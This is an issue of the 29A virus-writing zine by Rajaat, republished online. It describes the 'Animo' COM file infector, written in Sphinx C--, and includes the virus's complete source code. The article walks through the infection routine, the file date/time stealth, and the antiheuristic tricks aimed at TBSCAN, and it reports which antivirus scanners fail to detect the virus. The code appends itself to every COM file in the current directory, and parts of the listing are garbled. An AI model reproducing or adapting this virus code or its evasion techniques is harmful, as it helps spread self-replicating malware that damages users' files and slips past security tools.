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29A Issue 02 05 15

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Published in 
 · 28 Dec 2019


/*****( Animo virus description )**********************************************
Virus name : Animo ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Author : Rajaat / 29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
Origin : United Kingdom, January 29th ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
Compiling : Using Sphinx C-- (with XFILE pack) ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
This is a bit kind of special language, you can download it
and the additional XFILE pack (which contains the lseek
function) from the official Sphinx C-- site (it is written by
Peter Cellik) which is located at
Targets : COM files (yuck!)
Infects on : Runtime, files in the current directory (even more yuck!)
Size : 518 bytes (impressive for the language, I love it!)
Resident : No
Polymorphic : No
Encrypted : No
Stealth : File date/time, but no critical error handler
Tunneling : No
Retrovirus : No
Antiheuristics: Yes, targetted against TBSCAN, which gives zero flags
Armor : No
Payload : No
Trigger : None
Peculiarities : Written in Sphinx C-- is peculiar, I think, and a good start
too. Works only on 80386+ (so?)
Drawbacks : I don't know yet, this language happens to be so flexible that
you certainly can do a lot more than just COM files, I'm now
doing experiments with a multipartite virus already ;-)
Bugs : Not that I am aware of...
Behaviour : When an infected file is executed the virus will receive
control with a near jump to its code located at the
start of the file. Then it will get the entry point in
SI by calling to the next line (a call is relative) and
pop the return address (which is an absolute value) and
substract the original located address of get_offset,
effectively getting the difference of where the original
compiled code is located and the now running code. For
some reason unknown to me this doesn't alert TBSCAN,
which could spot entrypoints calls with ease and flag
like shit. Norman is really fucking up TBSCAN for
good... A shame. Well, after it gets the entrypoint it
will call to the start_replication() function. That
subroutine will first rebuild the first 4 bytes of the
infected COM file, so that it can be run again, after
the virus is ready doing its work. Then it sets the DTA
to the memory location where the virus in memory ends.
The next line is some antiheuristic code for TBSCAN, it
changes the "*.ZOM" search spec into "*.COM" (TBSCAN
would flag on COM so this little change shuts down one
flag). Then it will search for COM files with no
attributes set in the current directory. If such file is
found, it will temporarily store the search spec to
"*.ZOM" again. Then it calls the function infect() with
a pointer to the filename returned in the DTA as
parameter. infect() will open the file in read/write
mode and if the open succeeded it will read the first 4
bytes of the file into a small buffer. If the 4th byte
is an ! it will assume that the file is already infected
and will skip it. Then it will check if the opened file
has an EXE header. This is done in an antiheuristic
fashion. If the file is indeed a COM file, it seek to
the end of the file. If the filesize is larger than
0x100 bytes (convert them yourself, weenie!) and smaller
than 0xF000 (don't you have some calculator?), it will
proceed with the infection. It then calculates the
relative offset for the JMP instruction that will be
placed at the start of the file. Then it will get the
file date/time stamp and push it on the stack. After
that it will load it's registers with the correct data
and writes it's image at the end of the file. Then it
jump back to the start of the file and will write the
near jump to the virus code and the infection marker
(!). When finished, it will restore the file date/time
stamp and close the file. The routine to restore the
date/time is also done antiheuristically and is so
simple that I am amazed that TBSCAN fell for that
old-hat trick. After infecting a file, it will search
for the next file to infect, until all the files in the
current directory are infected. The virus sets the DTA
back to the normal address (0x80, which is 0x100 >> 2 or
0x100 / 2, whatever you like most, it's half of it). It
then pushes its return address (0x100, you already
calculated this one) in some antiheuristic (blah) way on
the stack, clears the AX register and returns control to
the host, which runs like normal (unless it has some
self check or when started with some oldsmobile).

Sara Ford..... sounds like Science Fiction to me
(those Capitals, are they Hidden Pictures or Some

Note : I know that this is a simple COM infector and below
standard, but this can be seen as a simple test to check
out for myself if C-- is a convenient language and if it
was possible to use for some more complex idea I
initially had in mind with Borland C++, of which you
also can get the source code on the first 2 versions (a
direct action appending COM infector and a MCB resident
appending COM infector). And yes, I think it is possible
to bend C-- to my own twisted desires (oh, I have played
Pandemonium 2 a bit too often lately, I fear). Well, the
actual story how I came to write a virus in the peculiar
language is like this: two days ago I found this program
on some homepage (see above) by accident, while using a
search engine to help me getting a C front-end for NASM,
the Netwide ASseMbler, which is really a great
Assembler, which I will try to use in the future
L:-o-P-< (Elvis Lives!). Yesterday I started my first
experiments in C-- to learn a bit how the language
works. Since I know both how to handle C and Assembler
(and some others like Pascal, that are not worthwile
mentioning here), and now my first virus written in this
language lies in front of you! You can see from the
source, that it is *VERY* flexible and if properly used,
you can build really complex viruses with this, using
the easy of C and the power of Assembler (btw, have you
noticed that I write the word Assembler with a Capital
A? Would this have a hidden meaning? Some Complex Code?
A Secret Message? No, it's just my Language Worshipping
Mood again &-! By the way, the virus compiles very
small, it's a very good compiler, and although writing
in assembler still creates much tighter code, I think
this language is worth a try. You can shorten code much
by using register functions (try getting most of the
return codes into the AX register, so you don't need the
return code, which takes one extra "ret" code, even when
returning with a fixed value).

I hereby would like to show my gratitude to Peter Cellik
for writing such a wonderful language, although I would
like to see some things added, like:

o structures
o unions
o functions that generate no code at all (not even
the IRET)
o the possibility to do some AND operation in
if statements, like:

if ((filesize > 0x100) && (filesize < 0xf000))

instead of this crummy way (although they
probably would generate the same thing, but I
think the above one is preferred and look more
clean to me):

if (filesize > 0x100)
if (filesize < 0xf000)

o doing some more complex calculations, which now
have to be broken up in parts, like:

cx = (cyl << 8 | sector) | (cyl & 0x300 >> 2);
CX = cx;

or even better:
CX = (cyl << 8 | sector) | (cyl & 0x300 >> 2);

instead of having to do manipulations like this,
which look not very readable to me:

cx = cyl << 8 | sector;
cx |= cyl & 0x300 >> 2;
CX = cx;

Or another example:

word virus_sectors()
AX = virus_bytes() / 512 + 1;

instead of:

word virus_sectors()
AX = virus_bytes() / 512;

Anyway, as a little token of my gratitude to Peter
Cellik, I will post a litte part of his documentation in


Anyone with a mischievous mind (most people do) can
think of some not so nice ways of using this function.
The most obvious of which would be the creation of
don't be a jerk. "

Well, I think I am no jerk, since I don't have to use
that "feature" :-). Anybody who wants to write viruses
in this language are also kindly asked to support Peter
Celliks idea of GREENWARE. To cite:

This version of C-- is GREENWARE, and you are free to
use it so long as you make an effort everyday to help
out the environment. A few ideas:

- use only recycled computer paper
- be sure to recycle the computer paper after you use it
- use public transport
- sell that 80 cylinder car of yours and buy a small 4
cylinder, or better yet, buy a motorbike
- support Green Peace
- REDUCE-REUSE-recycle
- stop smoking
- ride a bike to work or school
- don't buy products that are harmful to the environment
- stop using weed killers on your lawn
- support Friends of the Earth
- recycle your cans
- don't buy products that have lots of extra packaging
- use a fax modem instead of a paper fax machine
- reuse your plastic bags
- (you get the idea) "

Well, I think he has some great ideas there, in the
progress of writing viruses, I waste tons of paper, I
don't have a lawn, so I don't need weed killer anyway,
all my trash gets recycled already, I have access to a
HP Officejet LX, and I don't use plastic bags cut a more
robust one. But one can go too far, Peter. I won't quit
smoking, you never can convince me not going to Spain
with Darkman by car (although I am scared by thinking of
abandoning the "left hand path", and sure as hell I would
not support a group of terrorists that plum a seal for a
picture to shock people. I do not believe in the "can't
make an omelette without breaking a few eggs" attitude.
Fuck Green Peace! Though trying to stop French nuking
is ok :-).

Well, the comments are longer than the source, what else
can I say, enjoy! By the way, those pieces of example
codes of my wishlist above are code snippets for my next
virus in C--.

Rajaat / 29A
(I know, it's outdated, I hope to update it soon, a new
page is in the making)

Don't forget to take a look at these sites:

*****( Results with antivirus software )***************************************

TBSCAN - Doesn't detect it
F-PROT - Doesn't detect it (yet)
F-PROT /ANALYSE - Detects it
F-PROT /ANALYSE /PARANOID - Detects it (wow, genius)

*****( Greetings )*************************************************************

I hereby would like to take the opportunity to greet a few people:

- the rest of the 29A people (it is great to work with you people)
- the unforgiven and metal militia (heroes in the snow!)
- z0mbie (ShadowRAM Technology rocks!)
- [sm] (RT got quite some attention I heard!)
- owl[fs] (still breeding some ideas?)
- retch (MP3 CD? ;-)
- bds (hiya!)
- antigen and priest (when will I hear from you guys again?)
- rhincewind (someday I'll be able to contact you again... I hope)
- trigger (don't SLAM that door so hard, will ya?)
- spicy impregnator (no taste)
- qark & quantum (get back to work)
- metabolis (I miss your remarks)
- raid (ASIC is fun, but not my idea of ideal virus language, you
won't get much farther than a direct action generic prepending

If anybody feels left out who deserves to get greeted by me can paste
their name between to two lines for *FREE* inclusion:


hahahahahahahahahahahahahaha die trying!

*****( Start of the virus code )**********************************************/

? resize FALSE // No memory resizing
? jumptomain NONE // No jumps to main procedure
? codesize // Optimize code for size
? alignword FALSE // Align word on even offset set to off

? include "dos.h--" // Use DOS functions
? include "xfile.h--" // And now new extended functions (LSEEK)

byte virus_end; // Last Data Item

byte nops[4] = { 0x90, 0x90, 0x90, 0x90 }; // Fake host

word main() // Virus entry point
$ CALL get_delta //
get_delta: // Get delta offset in SI
$ POP SI //
SI -= #get_delta; //
start_replication(); // Call replicator
AX = 0x100 ^ 0x6510; // Push entrypoint
AX ^= 0x6510; // with some antiheuristics
$ PUSH AX; // on the stack and
AX = 0; // clear AX

byte host_bytes[4] = { 0xCD, 0x20, 0, 0 }; // Host data
byte searchspec = "*.ZOM"; // Searchspec
byte jumpop = 0xE9; // Near jump
word nearjmp = 0; // The offset
byte marker = '!'; // and infection marker

byte virus = "[Animo]"; // Spliffbanger!
byte author = "[Rajaat/29A]"; // some personal stuff

$ PUSH SI // Preserve delta
SI = #host_bytes[SI]; // Point to host bytes
DI = #nops; // Absolute nops is at 0x100
$ CLD // Clear direction
$ MOVSW // Move the 4 bytes we have save to the
$ MOVSW // start of the host
$ POP SI // Get delta back from stack
setDTA(CS,#virus_end[SI]); // Set DTA to behind virus image
searchspec[SI+2] = 'C'; // Antiheuristics again
if (FINDFIRSTFILE(,,0,#searchspec[SI]) == 0)
do // We found a COM file
searchspec[SI+2] = 'Z'; // Again some antiheuristic action
infect(#virus_end[SI+0x1e]); // And call the infection routine
searchspec[SI+2] = 'C'; // And back to normal for COM searching
FINDNEXTFILE(); // And find next function
} while (AX == 0); // Hopefully
setDTA(CS,0x80); // Restore DTA

infect(word filename) // Infection procedure
word handle; // Temporary file handle placement
word bytes_read; // Amount of bytes read
word myoffset; // My own offset (need multiple steps)
word twobytes;
long filesize; // And the filesize
handle = FOPEN(2,,,filename); // Open file with write access
if (handle != 0) // If no error
FREAD( , handle, 4, #host_bytes[SI]); // Read 4 bytes
if (host_bytes[SI+3] != '!') // Already infected
{ // No, we continue
twobytes = host_bytes[0]; // get 1st word
twobytes += host_bytes[1] << 8; // stupid way
twobytes ^= 0x029A; // Final antiheuristics
if (twobytes != 0x4d5a ^ 0x029A) // Check exe
if (twobytes != 0x5a4d ^ 0x029A) // weird exe
twobytes ^= 0x029A; // Decrypt again ;-)
filesize = lseek(handle, long 0, SEEK_END); // Get filesize
if (filesize > 0x100) // Not too small?
if (filesize < 0xf000) // Not too big?
{ // Right size!
nearjmp[SI] = filesize - 3; // Get relative EP
AX = 0x5700; // Store file date and
$ INT 0x21; // time on the
$ PUSH CX; // stack for later
$ PUSH DX; // retrieval
bytes_read = get_virus_size(); // virus size
myoffset = #main + SI; // relative virus start
FWRITE(, handle, bytes_read, myoffset); // write virus
lseek(handle, long 0, SEEK_SET); // go start of file
FWRITE(, handle, 4, #jumpop[SI]); // write jump
$ POP DX; // Restore date and
$ POP CX; // time of the file
AX = 0x5701 ^ 0x8086; // and put them back
AX ^= 0x8086; // on it with some
$ INT 0x21; // antiheuristics
FCLOSE(,handle); // Close file (we're done)

word get_virus_size() // Gets address of latest memory byte of
{ // virus, effectively getting the virus
AX = #virus_end-#main; // size

/*****( This is the end, my dear friend )*************************************/

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